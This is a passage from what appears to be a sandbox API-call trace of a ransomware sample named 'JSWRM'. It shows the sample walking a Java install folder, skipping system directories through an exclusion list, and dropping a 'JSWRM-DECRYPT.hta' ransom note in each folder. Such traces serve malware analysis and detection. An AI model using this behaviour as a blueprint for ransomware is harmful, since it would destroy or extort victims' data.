Files\\Java\\jre1.8.0_144\\bin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\jswrm-decrypt.hta")) returned 0x20 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23b400 | out: hHeap=0x1e0000) returned 1 [0069.411] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c7a0 | out: hHeap=0x1e0000) returned 1 [0069.411] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232c80 [0069.411] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\*.*", lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName=".", cAlternateFileName="")) returned 0x231c00 [0069.413] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.413] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa7406c5a, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0eaff93, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200811e2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="..", cAlternateFileName="")) returned 1 [0069.416] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.416] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.416] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x172440, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="awt.dll", cAlternateFileName="")) returned 1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2=".") returned 1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="..") returned 1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="...") returned 1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="windows") returned -1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="recovery") returned -1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="perflogs") returned -1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="documents and settings") returned -1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="system volume information") returned -1 [0069.416] lstrcmpiW (lpString1="awt.dll", lpString2="msocache") returned -1 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="awt.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="awt.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="awt.dll", lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="awt.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="awt.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="awt.dll", lpUsedDefaultChar=0x0) returned 7 [0069.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232bb0 [0069.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232c80 | out: hHeap=0x1e0000) returned 1 [0069.417] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x4240, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="bci.dll", cAlternateFileName="")) returned 1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2=".") returned 1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="..") returned 1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="...") returned 1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="windows") returned -1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="recovery") returned -1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="perflogs") returned -1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="documents and settings") returned -1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="system volume information") returned -1 [0069.417] lstrcmpiW (lpString1="bci.dll", lpString2="msocache") returned -1 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bci.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bci.dll", cchWideChar=7, lpMultiByteStr=0x345ef40, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bci.dll", lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bci.dll", cchWideChar=7, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 7 [0069.417] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="bci.dll", cchWideChar=7, lpMultiByteStr=0x345ef10, cbMultiByte=7, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="bci.dll", lpUsedDefaultChar=0x0) returned 7 [0069.417] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x233160 [0069.417] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232bb0 | out: hHeap=0x1e0000) returned 1 [0069.417] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x27040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="dcpr.dll", cAlternateFileName="")) returned 1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2=".") returned 1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="..") returned 1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="...") returned 1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="windows") returned -1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="recovery") returned -1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="perflogs") returned -1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="documents and settings") returned -1 [0069.417] lstrcmpiW (lpString1="dcpr.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.418] lstrcmpiW (lpString1="dcpr.dll", lpString2="system volume information") returned -1 [0069.418] lstrcmpiW (lpString1="dcpr.dll", lpString2="msocache") returned -1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcpr.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcpr.dll", cchWideChar=8, lpMultiByteStr=0x345ef40, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dcpr.dll", lpUsedDefaultChar=0x0) returned 8 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcpr.dll", cchWideChar=8, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dcpr.dll", cchWideChar=8, lpMultiByteStr=0x345ef10, cbMultiByte=8, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dcpr.dll", lpUsedDefaultChar=0x0) returned 8 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232ce8 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x233160 | out: hHeap=0x1e0000) returned 1 [0069.418] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x15040, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="decora_sse.dll", cAlternateFileName="DECORA~1.DLL")) returned 1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2=".") returned 1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="..") returned 1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="...") returned 1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="windows") returned -1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="recovery") returned -1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="perflogs") returned -1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="documents and settings") returned -1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="system volume information") returned -1 [0069.418] lstrcmpiW (lpString1="decora_sse.dll", lpString2="msocache") returned -1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="decora_sse.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="decora_sse.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="decora_sse.dll", lpUsedDefaultChar=0x0) returned 14 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="decora_sse.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0069.418] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="decora_sse.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="decora_sse.dll", lpUsedDefaultChar=0x0) returned 14 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0069.418] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0069.418] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232ce8 | out: hHeap=0x1e0000) returned 1 [0069.418] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x8f840, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="deploy.dll", cAlternateFileName="")) returned 1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2=".") returned 1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="..") returned 1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="...") returned 1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="windows") returned -1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="recovery") returned -1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="perflogs") returned -1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="documents and settings") returned -1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="system volume information") returned -1 [0069.419] lstrcmpiW (lpString1="deploy.dll", lpString2="msocache") returned -1 [0069.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0069.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.dll", cchWideChar=10, lpMultiByteStr=0x345ef40, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deploy.dll", lpUsedDefaultChar=0x0) returned 10 [0069.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0069.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0069.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.dll", cchWideChar=10, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 10 [0069.419] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deploy.dll", cchWideChar=10, lpMultiByteStr=0x345ef10, cbMultiByte=10, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deploy.dll", lpUsedDefaultChar=0x0) returned 10 [0069.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0069.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2094b8 [0069.419] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0069.419] FindNextFileW (in: hFindFile=0x231c00, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x20a6de, cFileName="dtplugin", cAlternateFileName="")) returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2=".") returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="..") returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="...") returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="windows") returned -1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="recovery") returned -1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="perflogs") returned -1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="documents and settings") returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="$RECYCLE.BIN") returned 1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="system volume information") returned -1 [0069.419] lstrcmpiW (lpString1="dtplugin", lpString2="msocache") returned -1 [0069.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x60) returned 0x232fc0 [0069.419] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x8e) returned 0x23b400 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x232fc0 | out: hHeap=0x1e0000) returned 1 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x216d80 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0069.420] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\jswrm-decrypt.hta")) returned 0xffffffff [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x216d80 | out: hHeap=0x1e0000) returned 1 [0069.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0069.420] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345baf4, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x1dc3) returned 0x24d1d8 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2c92) returned 0x24efa8 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d1d8 | out: hHeap=0x1e0000) returned 1 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0069.420] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217880 [0069.420] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209698 | out: hHeap=0x1e0000) returned 1 [0069.420] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\jswrm-decrypt.hta"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x454 [0069.460] SetFilePointer (in: hFile=0x454, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0069.460] WriteFile (in: hFile=0x454, lpBuffer=0x345bc08*, nNumberOfBytesToWrite=0x230c, lpNumberOfBytesWritten=0x345bbd4, lpOverlapped=0x0 | out: lpBuffer=0x345bc08*, lpNumberOfBytesWritten=0x345bbd4*=0x230c, lpOverlapped=0x0) returned 1 [0069.461] CloseHandle (hObject=0x454) returned 1 [0069.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217880 | out: hHeap=0x1e0000) returned 1 [0069.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24efa8 | out: hHeap=0x1e0000) returned 1 [0069.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209620 | out: hHeap=0x1e0000) returned 1 [0069.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2092d8 [0069.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209620 [0069.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209350 [0069.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0069.461] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6) returned 0x217250 [0069.461] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0069.462] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\JSWRM-DECRYPT.hta" (normalized: "c:\\program files\\java\\jre1.8.0_144\\bin\\dtplugin\\jswrm-decrypt.hta")) returned 0x20 [0069.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x217250 | out: hHeap=0x1e0000) returned 1 [0069.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209350 | out: hHeap=0x1e0000) returned 1 [0069.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209170 [0069.462] FindFirstFileW (in: lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\bin\\dtplugin\\*.*", lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200f36c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName=".", cAlternateFileName="")) returned 0x232000 [0069.462] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0069.462] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa0f2891a, ftLastAccessTime.dwHighDateTime=0x1d47ca3, ftLastWriteTime.dwLowDateTime=0x200f36c0, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName="..", cAlternateFileName="")) returned 1 [0069.462] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0069.462] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0069.462] FindNextFileW (in: hFindFile=0x232000, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa742cea6, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa742cea6, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa742cea6, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xfa840, dwReserved0=0x60002, dwReserved1=0x232f46, cFileName="deployJava1.dll", cAlternateFileName="DEPLOY~1.DLL")) returned 1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2=".") returned 1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="..") returned 1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="...") returned 1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="windows") returned -1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="recovery") returned -1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="perflogs") returned -1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="documents and settings") returned -1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="$RECYCLE.BIN") returned 1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="system volume information") returned -1 [0069.462] lstrcmpiW (lpString1="deployJava1.dll", lpString2="msocache") returned -1 [0069.462] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412b8 [0069.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployJava1.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.462] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployJava1.dll", cchWideChar=15, lpMultiByteStr=0x345ebd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="deployJava1.dll", lpUsedDefaultChar=0x0) returned 15 [0069.462] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412b8 | out: hHeap=0x1e0000) returned 1 [0069.464] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0069.464] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="deployJava1.dll", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0069.464] WideCharToMultiByte (in: 